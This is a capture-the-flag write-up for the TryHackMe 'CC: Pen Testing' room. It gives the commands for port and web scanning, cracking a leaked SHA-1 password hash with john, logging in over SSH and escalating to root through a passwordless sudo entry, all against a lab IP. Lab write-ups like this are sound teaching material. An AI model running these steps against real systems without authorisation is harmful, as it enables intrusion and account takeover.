THM: Crash Course Pen Testing
Write-up for final challenge at CC: Pen Testing room at TryHackMe
Basic Information
# | |
Type | Regular Box |
Name | Try Hack Me / CC: Pen Testing |
URLs | tryhackme.com/room/ccpentesting |
Author | Asentinn / OkabeRintaro |
https://ctftime.org/team/152207 |
Contents
๐
CyberEthical.Me
is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or ๐ become a Patron which also gives you some bonus perks.
Join our Discord Server!
Recon
Target IP is 10.10.113.202
- I'm assigning that to the variable for ease of use.
$ IP=10.10.113.202
Scanning for open ports
$ nmap -sC -sV -p- $IP -oN nmap-$IP.out
And prepare input for the searchsploit
$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml
Firing up nikto
and fuff
for practice
$ nikto -h $IP -o nikto-$IP.txt
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md
ffuf
command can be a little complicated, so let me explain it a bit
-w
: wordlist for fuzzing-u
: target URL-recursion
,-recursion-depth
: whenfuff
finds a directory, it starts another scan after the current finished (you will recognize it byJob [1/X]
label)-e
: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).-v
: shows full URL of the findings (useful when using-recursion
flag)-of
: output format,ffuf
output files are not the easiest one to read, but and I choose the Markdown for now-o
: and this is just a name for the output file;$IP
will resolve variable name and the result
Back to top โคด
Cracking user password
Both find out the /secret/
directory and fuff
further tracked the /secret/secret.txt
.
$ curl http://10.10.200.35/secret/secret.txt
Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the hash-identifier
that comes with Kali to see the output just out of curiosity.
$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8
As we can see it is the SHA-1 hash. Now cracking it with john
:
$ john -format=Raw-SHA1 secret.txt
Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.
$ ssh nyan@$IP
Were in. I'm getting the user flag.
nyan@ubuntu:~$ cat user.txt
Back to top โคด
Elevating privileges
User nyan can run /bin/su as a root without specifying its password
And just by seeing this sudoer entry we know that nyan is a can execute sudo
command.
Otherwise when running
sudo -l
we would seeSorry, user nyan may not run sudo on ubuntu
(whereubuntu
is the host name)
We got the root! So cat
out that flag and complete the box.
root@ubuntu:/home/nyan# cat /root/root.txt
Additional readings
๐ Follow the
#CyberEthical
hashtag on the social media
๐ Become a Patron and gain additional benefits
๐พ Join CyberEthical Discord server
๐ Instagram: @cyber.ethical.me
๐ LinkedIn: Kamil Gierach-Pacanek
๐ Twitter: @cyberethical_me
๐ Facebook: @CyberEthicalMe
Back to top โคด